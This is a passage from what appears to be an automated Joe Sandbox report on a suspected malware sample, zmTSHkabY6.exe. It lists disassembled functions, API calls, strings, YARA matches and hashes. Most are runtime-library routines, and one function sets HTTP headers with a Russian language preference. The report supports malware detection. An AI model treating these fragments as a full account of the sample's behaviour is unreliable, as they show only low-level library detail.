                                                                    • __EH_prolog3_GS.LIBCMT ref: 100010CE
                                                                    • HttpAddRequestHeadersA.WININET(?,?,?,20000000), ref: 10001103
                                                                    • HttpAddRequestHeadersA.WININET(?,?,?,20000000), ref: 10001123
                                                                    • HttpAddRequestHeadersA.WININET(?,?,?,20000000), ref: 10001143
                                                                    • HttpAddRequestHeadersA.WININET(?,?,?,20000000), ref: 10001163
                                                                    Strings
                                                                    • Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1, xrefs: 100010D9
                                                                    • Accept-Language: ru-RU,ru;q=0.9,en;q=0.8, xrefs: 10001105
                                                                    • Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0, xrefs: 10001145
                                                                    • Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1, xrefs: 10001125
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3223708397.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.3223691367.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3223729109.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3223747769.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_zmTSHkabY6.jbxd
                                                                    Similarity
                                                                    • API ID: HeadersHttpRequest$H_prolog3_
                                                                    • String ID: Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1$Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0$Accept-Language: ru-RU,ru;q=0.9,en;q=0.8$Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                    • API String ID: 1254599795-787135837
                                                                    • Opcode ID: 8d3d7825b2bb6dea36e27622bcd4b7ddfc44603214986a735072bca3a8471053
                                                                    • Instruction ID: 505ec4d7c45309835e960384523a5e30396a54de81b8e769e2ad7823f420ed9d
                                                                    • Opcode Fuzzy Hash: 8d3d7825b2bb6dea36e27622bcd4b7ddfc44603214986a735072bca3a8471053
                                                                    • Instruction Fuzzy Hash: DA119372D0010DEEEB10DBA9DC91DEEBB78EB18351FA0C019F22176051DB75AA45DBB1
                                                                    Function 00E9134C Relevance: 15.1, APIs: 10, Instructions: 69COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • _free.LIBCMT ref: 00E91362
                                                                      • Part of subcall function 00E91D29: HeapFree.KERNEL32(00000000,00000000,?,00E972DB,?,00000000,?,?,?,00E97302,?,00000007,?,?,00E975E1,?), ref: 00E91D3F
                                                                      • Part of subcall function 00E91D29: GetLastError.KERNEL32(?,?,00E972DB,?,00000000,?,?,?,00E97302,?,00000007,?,?,00E975E1,?,?), ref: 00E91D51
                                                                    • _free.LIBCMT ref: 00E9136E
                                                                    • _free.LIBCMT ref: 00E91379
                                                                    • _free.LIBCMT ref: 00E91384
                                                                    • _free.LIBCMT ref: 00E9138F
                                                                    • _free.LIBCMT ref: 00E9139A
                                                                    • _free.LIBCMT ref: 00E913A5
                                                                    • _free.LIBCMT ref: 00E913B0
                                                                    • _free.LIBCMT ref: 00E913BB
                                                                    • _free.LIBCMT ref: 00E913C9
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3221073765.0000000000E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e80000_zmTSHkabY6.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                    • String ID:
                                                                    • API String ID: 776569668-0
                                                                    • Opcode ID: fe283fd8c536959d9cbb52a3305d3fc21224adf50181bca55d874b9ff2adc1f7
                                                                    • Instruction ID: 421cd44e082eac1a8268aa391fc149ab6299e8ed057a9a8348a91a10493fbb72
                                                                    • Opcode Fuzzy Hash: fe283fd8c536959d9cbb52a3305d3fc21224adf50181bca55d874b9ff2adc1f7
                                                                    • Instruction Fuzzy Hash: F321A47A90011DEFCF05EFA5D881DDE7BB8AF08341B0165A6B615AB121DB31EA44CB81
                                                                    Function 004110E5 Relevance: 15.1, APIs: 10, Instructions: 69COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • _free.LIBCMT ref: 004110FB
                                                                      • Part of subcall function 00411AC2: RtlFreeHeap.NTDLL(00000000,00000000,?,00417074,?,00000000,?,?,?,0041709B,?,00000007,?,?,0041737A,?), ref: 00411AD8
                                                                      • Part of subcall function 00411AC2: GetLastError.KERNEL32(?,?,00417074,?,00000000,?,?,?,0041709B,?,00000007,?,?,0041737A,?,?), ref: 00411AEA
                                                                    • _free.LIBCMT ref: 00411107
                                                                    • _free.LIBCMT ref: 00411112
                                                                    • _free.LIBCMT ref: 0041111D
                                                                    • _free.LIBCMT ref: 00411128
                                                                    • _free.LIBCMT ref: 00411133
                                                                    • _free.LIBCMT ref: 0041113E
                                                                    • _free.LIBCMT ref: 00411149
                                                                    • _free.LIBCMT ref: 00411154
                                                                    • _free.LIBCMT ref: 00411162
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3219817700.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3219817700.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_zmTSHkabY6.jbxd
                                                                    Similarity
                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                    • String ID:
                                                                    • API String ID: 776569668-0
                                                                    • Opcode ID: 9528e1cdbf83faf96e5ccd5663a9dae100ce71697e6d3b34ec1221184646fa63
                                                                    • Instruction ID: 5835e015de09c4cc1f53331febaa62aeb6779b48f58b4a69f4cd00ff2e5db2ca
                                                                    • Opcode Fuzzy Hash: 9528e1cdbf83faf96e5ccd5663a9dae100ce71697e6d3b34ec1221184646fa63
                                                                    • Instruction Fuzzy Hash: 3D219876900108AFCB41EF95C881DDE7FB9BF48344B0445ABB6199B121EB75DA84CB84
                                                                    Function 0041A609 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 147COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • RtlDecodePointer.NTDLL(?), ref: 0041A622
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3219817700.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3219817700.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_zmTSHkabY6.jbxd
                                                                    Similarity
                                                                    • API ID: DecodePointer
                                                                    • String ID: acos$asin$exp$log$log10$pow$sqrt
                                                                    • API String ID: 3527080286-3064271455
                                                                    • Opcode ID: b0f5ff7df8ac5b22e86cd4b492fd97d41adae4fcfb0b2561f3f2f1ad21474b7f
                                                                    • Instruction ID: 98f7bf46ea2d04c7b06ac9836e821450726948aa73f1de9436264de5739e925b
                                                                    • Opcode Fuzzy Hash: b0f5ff7df8ac5b22e86cd4b492fd97d41adae4fcfb0b2561f3f2f1ad21474b7f
                                                                    • Instruction Fuzzy Hash: 5651ACB490121ACBDF109FA8E94C1EEBBB0FB05300F554047D4A1A62A5C77CCAF68B5E
                                                                    Function 10004131 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 303COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • type_info::operator==.LIBVCRUNTIME ref: 10004250
                                                                    • ___TypeMatch.LIBVCRUNTIME ref: 1000435E
                                                                    • _UnwindNestedFrames.LIBCMT ref: 100044B0
                                                                    • CallUnexpected.LIBVCRUNTIME ref: 100044CB
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3223708397.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.3223691367.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3223729109.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3223747769.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_zmTSHkabY6.jbxd
                                                                    Similarity
                                                                    • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                                    • String ID: csm$csm$csm
                                                                    • API String ID: 2751267872-393685449
                                                                    • Opcode ID: c4421cf047d38b61ed069ce13853ee51e8b724bc32a0b317f19ee854d316b146
                                                                    • Instruction ID: 3d3d7b973083d5502e03e9704e538657a8ad6664bd6ca03923258a49de60437f
                                                                    • Opcode Fuzzy Hash: c4421cf047d38b61ed069ce13853ee51e8b724bc32a0b317f19ee854d316b146
                                                                    • Instruction Fuzzy Hash: C0B180B5C00209DFEF05DF94D881A9EBBB9FF04390F12415AF8116B21ADB31EA51CB99
                                                                    Function 00E892EF Relevance: 12.1, APIs: 8, Instructions: 51libraryloaderCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • InitializeCriticalSectionAndSpinCount.KERNEL32(0042AF64,00000FA0,?,?,00E892CD), ref: 00E892FB
                                                                    • GetModuleHandleW.KERNEL32(0041DFB8,?,?,00E892CD), ref: 00E89306
                                                                    • GetModuleHandleW.KERNEL32(0041DFFC,?,?,00E892CD), ref: 00E89317
                                                                    • GetProcAddress.KERNEL32(00000000,0041E018), ref: 00E89329
                                                                    • GetProcAddress.KERNEL32(00000000,0041E034), ref: 00E89337
                                                                    • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,00E892CD), ref: 00E8935A
                                                                    • RtlDeleteCriticalSection.NTDLL(0042AF64), ref: 00E89376
                                                                    • CloseHandle.KERNEL32(0042AF60,?,?,00E892CD), ref: 00E89386
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3221073765.0000000000E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e80000_zmTSHkabY6.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
                                                                    • String ID:
                                                                    • API String ID: 2565136772-0
                                                                    • Opcode ID: f40741635cb42056a58b419ea30317dd48f67c6f9c1bd194eb93f888c376e813
                                                                    • Instruction ID: fb947f359a730675b6be8315fbf97a556483bba619d5ec4bdedab00fd96663e6
                                                                    • Opcode Fuzzy Hash: f40741635cb42056a58b419ea30317dd48f67c6f9c1bd194eb93f888c376e813
                                                                    • Instruction Fuzzy Hash: 520156B5F40721ABD7202B75AD09BAA3BA8AB4CB05B194121FD0DE2195D76CC8418769
                                                                    Function 100028D6 Relevance: 10.6, APIs: 7, Instructions: 136COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • __RTC_Initialize.LIBCMT ref: 1000291D
                                                                    • ___scrt_uninitialize_crt.LIBCMT ref: 10002937
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3223708397.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.3223691367.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3223729109.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3223747769.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_zmTSHkabY6.jbxd
                                                                    Similarity
                                                                    • API ID: Initialize___scrt_uninitialize_crt
                                                                    • String ID:
                                                                    • API String ID: 2442719207-0
                                                                    • Opcode ID: bcaf1c042ea0bc50edbc81b8ebd31fe72f9a2e1de53f2412ad321d30f710d584
                                                                    • Instruction ID: 04769ff959a67eddfc0a91c70c155494b73e6b711ec1a15a155288148215b0b0
                                                                    • Opcode Fuzzy Hash: bcaf1c042ea0bc50edbc81b8ebd31fe72f9a2e1de53f2412ad321d30f710d584
                                                                    • Instruction Fuzzy Hash: 3741F372E05229AFFB21CF68CC41BAF7BA4EB846D0F114119F84467258DB309E419BA1
                                                                    Function 0040ABE0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • _ValidateLocalCookies.LIBCMT ref: 0040AC17
                                                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 0040AC1F
                                                                    • _ValidateLocalCookies.LIBCMT ref: 0040ACA8
                                                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 0040ACD3
                                                                    • _ValidateLocalCookies.LIBCMT ref: 0040AD28
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3219817700.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3219817700.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_zmTSHkabY6.jbxd
                                                                    Similarity
                                                                    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                    • String ID: csm
                                                                    • API String ID: 1170836740-1018135373
                                                                    • Opcode ID: 33bf7593fb2420a6276facfce688e1aeeae85943ba4b5033adcc5dff2c976554
                                                                    • Instruction ID: 3b4537d877df667a26a5f7af8fbb8c140355993206fc9854477fa74853602e25
                                                                    • Opcode Fuzzy Hash: 33bf7593fb2420a6276facfce688e1aeeae85943ba4b5033adcc5dff2c976554
                                                                    • Instruction Fuzzy Hash: 5E41E634A003089BDF10DF69C844A9FBBB1EF45318F14806AEC156B3D2C7399A65CBDA
                                                                    Function 10003A20 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • _ValidateLocalCookies.LIBCMT ref: 10003A57
                                                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 10003A5F
                                                                    • _ValidateLocalCookies.LIBCMT ref: 10003AE8
                                                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 10003B13
                                                                    • _ValidateLocalCookies.LIBCMT ref: 10003B68
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3223708397.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.3223691367.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3223729109.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3223747769.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_zmTSHkabY6.jbxd
                                                                    Similarity
                                                                    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                    • String ID: csm
                                                                    • API String ID: 1170836740-1018135373
                                                                    • Opcode ID: 618cc4b1c9e8ab126c58b9dfa5104022869f7905af091c597ce0ca7ba0b792b2
                                                                    • Instruction ID: 53213870faae5245fec6ed73a44d54790f208d332314260de239e107b7581961
                                                                    • Opcode Fuzzy Hash: 618cc4b1c9e8ab126c58b9dfa5104022869f7905af091c597ce0ca7ba0b792b2
                                                                    • Instruction Fuzzy Hash: 2A41E434A002189FDF02CF68C881A9FBBF9EF453A8F11C065E9149B356C771EA15CB91
                                                                    Function 0041611C Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 83COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3219817700.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3219817700.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_zmTSHkabY6.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: C:\Users\user\Desktop\zmTSHkabY6.exe$obA
                                                                    • API String ID: 0-3443419229
                                                                    • Opcode ID: 25d76702c84b0b1a2803db8c0b9f12018f39228ab9c5ebd3ea8f3f736e5c4ef2
                                                                    • Instruction ID: d8f7faa714452712b8dd2e2ad71d7e848a624b740a48fc3c62d8856f0a647b07
                                                                    • Opcode Fuzzy Hash: 25d76702c84b0b1a2803db8c0b9f12018f39228ab9c5ebd3ea8f3f736e5c4ef2
                                                                    • Instruction Fuzzy Hash: E321F971600219BFDB20AF668C81DAB776DEF00368712863BFD15D7291D738ED8187A8
                                                                    Function 00411B4A Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3219817700.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3219817700.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_zmTSHkabY6.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: api-ms-$ext-ms-
                                                                    • API String ID: 0-537541572
                                                                    • Opcode ID: e542fd5fe1f20daa28cc2bb0b7df5d538cfe0501b749800661c5dcfdf3bad05e
                                                                    • Instruction ID: 9472c79033c58d28bd5fab4bb402529842eae37fc53cf50cf89856cde478e707
                                                                    • Opcode Fuzzy Hash: e542fd5fe1f20daa28cc2bb0b7df5d538cfe0501b749800661c5dcfdf3bad05e
                                                                    • Instruction Fuzzy Hash: 1F21D571E09221ABCB218B259C44BDB3758AF017A4F254527EE06A73A0F63CFC41C6E8
                                                                    Function 100072FC Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3223708397.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.3223691367.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3223729109.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3223747769.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_zmTSHkabY6.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: api-ms-$ext-ms-
                                                                    • API String ID: 0-537541572
                                                                    • Opcode ID: cde85c6b5c8b57cdf34b7df1744eca22314f2c72a21997f039bbb8b7806936d4
                                                                    • Instruction ID: 4a8ea71034e84b8525c0961ad639e20c08c2bf99947945f029ec6b94e21b7784
                                                                    • Opcode Fuzzy Hash: cde85c6b5c8b57cdf34b7df1744eca22314f2c72a21997f039bbb8b7806936d4
                                                                    • Instruction Fuzzy Hash: DC219671E01321EBF722DB648C81A4E37A4FB456E0B214124ED59A7195D778EE00A6E1
                                                                    Function 00E972E9 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00E972B1: _free.LIBCMT ref: 00E972D6
                                                                    • _free.LIBCMT ref: 00E97337
                                                                      • Part of subcall function 00E91D29: HeapFree.KERNEL32(00000000,00000000,?,00E972DB,?,00000000,?,?,?,00E97302,?,00000007,?,?,00E975E1,?), ref: 00E91D3F
                                                                      • Part of subcall function 00E91D29: GetLastError.KERNEL32(?,?,00E972DB,?,00000000,?,?,?,00E97302,?,00000007,?,?,00E975E1,?,?), ref: 00E91D51
                                                                    • _free.LIBCMT ref: 00E97342
                                                                    • _free.LIBCMT ref: 00E9734D
                                                                    • _free.LIBCMT ref: 00E973A1
                                                                    • _free.LIBCMT ref: 00E973AC
                                                                    • _free.LIBCMT ref: 00E973B7
                                                                    • _free.LIBCMT ref: 00E973C2
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3221073765.0000000000E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e80000_zmTSHkabY6.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                    • String ID:
                                                                    • API String ID: 776569668-0
                                                                    • Opcode ID: 68c17f3537dccb6f407bd63d1e3096b2584649c38850d27baa78e981a952f3fd
                                                                    • Instruction ID: c65d7e5c934e4f4a7db2f59c6eab4242d543b734cedc34b2fb50e619f3da14fd
                                                                    • Opcode Fuzzy Hash: 68c17f3537dccb6f407bd63d1e3096b2584649c38850d27baa78e981a952f3fd
                                                                    • Instruction Fuzzy Hash: 54114CB5564B18AADE20BBB0CC47FCB7BDCAF06700F402C15F2E9B6062DA65B5188661
                                                                    Function 00417082 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 0041704A: _free.LIBCMT ref: 0041706F
                                                                    • _free.LIBCMT ref: 004170D0
                                                                      • Part of subcall function 00411AC2: RtlFreeHeap.NTDLL(00000000,00000000,?,00417074,?,00000000,?,?,?,0041709B,?,00000007,?,?,0041737A,?), ref: 00411AD8
                                                                      • Part of subcall function 00411AC2: GetLastError.KERNEL32(?,?,00417074,?,00000000,?,?,?,0041709B,?,00000007,?,?,0041737A,?,?), ref: 00411AEA
                                                                    • _free.LIBCMT ref: 004170DB
                                                                    • _free.LIBCMT ref: 004170E6
                                                                    • _free.LIBCMT ref: 0041713A
                                                                    • _free.LIBCMT ref: 00417145
                                                                    • _free.LIBCMT ref: 00417150
                                                                    • _free.LIBCMT ref: 0041715B
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3219817700.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3219817700.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_zmTSHkabY6.jbxd
                                                                    Similarity
                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                    • String ID:
                                                                    • API String ID: 776569668-0
                                                                    • Opcode ID: 7beb403989f2ff45ac883155ca3436412fe8c3dddbb890deb39d287985adf827
                                                                    • Instruction ID: 17f1ba636a3ac0ac971b1a3f484e478362915a153c89e36741bf365215ef3bb6
                                                                    • Opcode Fuzzy Hash: 7beb403989f2ff45ac883155ca3436412fe8c3dddbb890deb39d287985adf827
                                                                    • Instruction Fuzzy Hash: 9C118EB2585744B6D520B772CC06FCB7BEC6F48304F40481FB69E66063EA2CAAC04645
                                                                    Function 00E97F3A Relevance: 9.3, APIs: 6, Instructions: 318fileCOMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetConsoleCP.KERNEL32(00000000,00000000,00000000), ref: 00E97F82
                                                                    • __fassign.LIBCMT ref: 00E98161
                                                                    • __fassign.LIBCMT ref: 00E9817E
                                                                    • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00E981C6
                                                                    • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00E98206
                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 00E982B2
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3221073765.0000000000E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e80000_zmTSHkabY6.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: FileWrite__fassign$ConsoleErrorLast
                                                                    • String ID:
                                                                    • API String ID: 4031098158-0
                                                                    • Opcode ID: 7b0876cbb8b9c7573fbc639d1b90b5e6ef59ffe5efa56104f918bce5801debe4
                                                                    • Instruction ID: b1c548fa13e6d2458c35b483d8a703f77caae40c5b9ecc207b4098d75dcf607c
                                                                    • Opcode Fuzzy Hash: 7b0876cbb8b9c7573fbc639d1b90b5e6ef59ffe5efa56104f918bce5801debe4
                                                                    • Instruction Fuzzy Hash: 4ED1CC71D016489FCF15CFE8C9809EDBBB5FF4A304F28116AE855BB262DB31A946CB50
                                                                    Function 00417CD3 Relevance: 9.3, APIs: 6, Instructions: 318fileCOMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetConsoleCP.KERNEL32(00000020,00000000,00000000), ref: 00417D1B
                                                                    • __fassign.LIBCMT ref: 00417EFA
                                                                    • __fassign.LIBCMT ref: 00417F17
                                                                    • WriteFile.KERNEL32(?,00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00417F5F
                                                                    • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00417F9F
                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 0041804B
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3219817700.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3219817700.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_zmTSHkabY6.jbxd
                                                                    Similarity
                                                                    • API ID: FileWrite__fassign$ConsoleErrorLast
                                                                    • String ID:
                                                                    • API String ID: 4031098158-0
                                                                    • Opcode ID: 7d169ff53d2c182e8e6c437c86224f09291a86b025f17f4b0d862f02f7e42911
                                                                    • Instruction ID: bf6bde338aaa4c5312f696cbfa7b8c1c2da82e764b9ff6896d8d464e3c4a4b13
                                                                    • Opcode Fuzzy Hash: 7d169ff53d2c182e8e6c437c86224f09291a86b025f17f4b0d862f02f7e42911
                                                                    • Instruction Fuzzy Hash: 13D19C71E042589FCF15CFA8C9809EEBBB5FF49314F29006AE815BB341D735A986CB58
                                                                    Function 1000B6D8 Relevance: 9.3, APIs: 6, Instructions: 317fileCOMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetConsoleOutputCP.KERNEL32(?,00000001,?), ref: 1000B720
                                                                    • __fassign.LIBCMT ref: 1000B905
                                                                    • __fassign.LIBCMT ref: 1000B922
                                                                    • WriteFile.KERNEL32(?,10009A1A,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 1000B96A
                                                                    • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 1000B9AA
                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 1000BA52
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3223708397.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.3223691367.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3223729109.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3223747769.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_zmTSHkabY6.jbxd
                                                                    Similarity
                                                                    • API ID: FileWrite__fassign$ConsoleErrorLastOutput
                                                                    • String ID:
                                                                    • API String ID: 1735259414-0
                                                                    • Opcode ID: 56600ca1f679adaeecf8f36430617c19199fd47716f68d51f6ae8f72f541c1cc
                                                                    • Instruction ID: 817bf58f8fa712ded97291eda06853010b29bdec4c6be72b636a35a8a914ce65
                                                                    • Opcode Fuzzy Hash: 56600ca1f679adaeecf8f36430617c19199fd47716f68d51f6ae8f72f541c1cc
                                                                    • Instruction Fuzzy Hash: 9DC1CF75D006989FEB11CFE8C8809EDBBB5EF09354F28816AE855F7245D631AE42CB60
                                                                    Function 00E8B00B Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetLastError.KERNEL32(?,?,00E8B002,00E8A5C6,00E89C00), ref: 00E8B019
                                                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00E8B027
                                                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00E8B040
                                                                    • SetLastError.KERNEL32(00000000,00E8B002,00E8A5C6,00E89C00), ref: 00E8B092
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3221073765.0000000000E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e80000_zmTSHkabY6.jbxd
                                                                    Yara matches
                                                                    Similarity
